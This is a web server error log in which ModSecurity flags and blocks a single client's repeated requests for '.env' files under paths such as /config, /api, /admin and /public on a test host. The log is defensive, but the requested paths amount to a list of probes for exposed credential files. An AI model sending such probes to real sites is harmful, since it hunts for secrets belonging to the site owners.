[Fri Nov 28 20:53:13.768099 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSn9qasCtNc1QXFJ-Iu0wAAAABM"]
[Fri Nov 28 20:53:13.768338 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSn9qasCtNc1QXFJ-Iu0wAAAABM"]
[Fri Nov 28 20:53:13.768538 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aSn9qasCtNc1QXFJ-Iu0wAAAABM"]
[Fri Nov 28 20:53:14.005120 2025] [:error] [pid 391534] [client 35.183.137.215:58436] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSn9qoXAn3U8Qs12Ils-RgAAAAw"]
[Fri Nov 28 20:53:14.005340 2025] [:error] [pid 391534] [client 35.183.137.215:58436] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSn9qoXAn3U8Qs12Ils-RgAAAAw"]
[Fri Nov 28 20:53:14.005525 2025] [:error] [pid 391534] [client 35.183.137.215:58436] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSn9qoXAn3U8Qs12Ils-RgAAAAw"]
[Fri Nov 28 20:53:14.251134 2025] [:error] [pid 391535] [client 35.183.137.215:58612] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSn9qjp6mGAaMCBhPPj61wAAAA0"]
[Fri Nov 28 20:53:14.251355 2025] [:error] [pid 391535] [client 35.183.137.215:58612] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSn9qjp6mGAaMCBhPPj61wAAAA0"]
[Fri Nov 28 20:53:14.251561 2025] [:error] [pid 391535] [client 35.183.137.215:58612] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSn9qjp6mGAaMCBhPPj61wAAAA0"]
[Fri Nov 28 20:53:15.051260 2025] [authz_core:error] [pid 391532] [client 35.183.137.215:58254] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Fri Nov 28 20:53:15.052710 2025] [:error] [pid 391536] [client 35.183.137.215:58754] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSn9q04qxyPu8hMP1aX-ggAAAA4"]
[Fri Nov 28 20:53:15.052911 2025] [:error] [pid 391536] [client 35.183.137.215:58754] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSn9q04qxyPu8hMP1aX-ggAAAA4"]
[Fri Nov 28 20:53:15.053068 2025] [:error] [pid 391536] [client 35.183.137.215:58754] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSn9q04qxyPu8hMP1aX-ggAAAA4"]
[Fri Nov 28 20:53:15.519330 2025] [:error] [pid 393306] [client 35.183.137.215:58946] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSn9q46N2QcUcCUvadUSLQAAAAA"]
[Fri Nov 28 20:53:15.520404 2025] [:error] [pid 393306] [client 35.183.137.215:58946] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSn9q46N2QcUcCUvadUSLQAAAAA"]
[Fri Nov 28 20:53:15.520632 2025] [:error] [pid 393306] [client 35.183.137.215:58946] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSn9q46N2QcUcCUvadUSLQAAAAA"]
[Fri Nov 28 20:53:16.131274 2025] [:error] [pid 391539] [client 35.183.137.215:58378] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSn9rE0ytNsN5yZBlb_4KAAAABE"]
[Fri Nov 28 20:53:16.131612 2025] [:error] [pid 391539] [client 35.183.137.215:58378] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSn9rE0ytNsN5yZBlb_4KAAAABE"]
[Fri Nov 28 20:53:16.131858 2025] [:error] [pid 391539] [client 35.183.137.215:58378] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aSn9rE0ytNsN5yZBlb_4KAAAABE"]
[Fri Nov 28 20:53:16.639040 2025] [:error] [pid 393307] [client 35.183.137.215:59316] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSn9rGywcVl8n6SM7RtRbwAAAAE"]
[Fri Nov 28 20:53:16.639305 2025] [:error] [pid 393307] [client 35.183.137.215:59316] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSn9rGywcVl8n6SM7RtRbwAAAAE"]
[Fri Nov 28 20:53:16.639524 2025] [:error] [pid 393307] [client 35.183.137.215:59316] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aSn9rGywcVl8n6SM7RtRbwAAAAE"]
[Fri Nov 28 20:53:16.823281 2025] [:error] [pid 393308] [client 35.183.137.215:59564] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSn9rK-Idoxz20B0R39VCwAAAAI"]
[Fri Nov 28 20:53:16.823550 2025] [:error] [pid 393308] [client 35.183.137.215:59564] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSn9rK-Idoxz20B0R39VCwAAAAI"]
[Fri Nov 28 20:53:16.823777 2025] [:error] [pid 393308] [client 35.183.137.215:59564] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aSn9rK-Idoxz20B0R39VCwAAAAI"]
[Fri Nov 28 20:53:17.132090 2025] [:error] [pid 391532] [client 35.183.137.215:58254] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSn9repNjqKOvIlYLfVcYQAAAAk"]
[Fri Nov 28 20:53:17.132311 2025] [:error] [pid 391532] [client 35.183.137.215:58254] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSn9repNjqKOvIlYLfVcYQAAAAk"]
[Fri Nov 28 20:53:17.132527 2025] [:error] [pid 391532] [client 35.183.137.215:58254] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aSn9repNjqKOvIlYLfVcYQAAAAk"]
[Fri Nov 28 20:53:17.689214 2025] [:error] [pid 391539] [client 35.183.137.215:58378] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSn9rU0ytNsN5yZBlb_4KQAAABE"]
[Fri Nov 28 20:53:17.689549 2025] [:error] [pid 391539] [client 35.183.137.215:58378] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSn9rU0ytNsN5yZBlb_4KQAAABE"]
[Fri Nov 28 20:53:17.689825 2025] [:error] [pid 391539] [client 35.183.137.215:58378] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aSn9rU0ytNsN5yZBlb_4KQAAABE"]
[Fri Nov 28 20:53:18.149219 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSn9rqsCtNc1QXFJ-Iu0wQAAABM"]
[Fri Nov 28 20:53:18.149427 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSn9rqsCtNc1QXFJ-Iu0wQAAABM"]
[Fri Nov 28 20:53:18.149622 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aSn9rqsCtNc1QXFJ-Iu0wQAAABM"]
[Fri Nov 28 20:53:18.486624 2025] [:error] [pid 391539] [client 35.183.137.215:58378] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSn9rk0ytNsN5yZBlb_4KgAAABE"]
[Fri Nov 28 20:53:18.486848 2025] [:error] [pid 391539] [client 35.183.137.215:58378] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSn9rk0ytNsN5yZBlb_4KgAAABE"]
[Fri Nov 28 20:53:18.487064 2025] [:error] [pid 391539] [client 35.183.137.215:58378] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aSn9rk0ytNsN5yZBlb_4KgAAABE"]
[Fri Nov 28 20:53:19.144422 2025] [:error] [pid 391532] [client 35.183.137.215:58254] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSn9r-pNjqKOvIlYLfVcYgAAAAk"]
[Fri Nov 28 20:53:19.144670 2025] [:error] [pid 391532] [client 35.183.137.215:58254] [client 35.183.137.215] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSn9r-pNjqKOvIlYLfVcYgAAAAk"]
[Fri Nov 28 20:53:19.144885 2025] [:error] [pid 391532] [client 35.183.137.215:58254] [client 35.183.137.215] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aSn9r-pNjqKOvIlYLfVcYgAAAAk"]
[Fri Nov 28 20:53:19.401894 2025] [:error] [pid 391541] [client 35.183.137.215:58112] [client 35.183.137.215] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aSn9r6sCtNc1QXFJ-Iu0wgAAABM"]
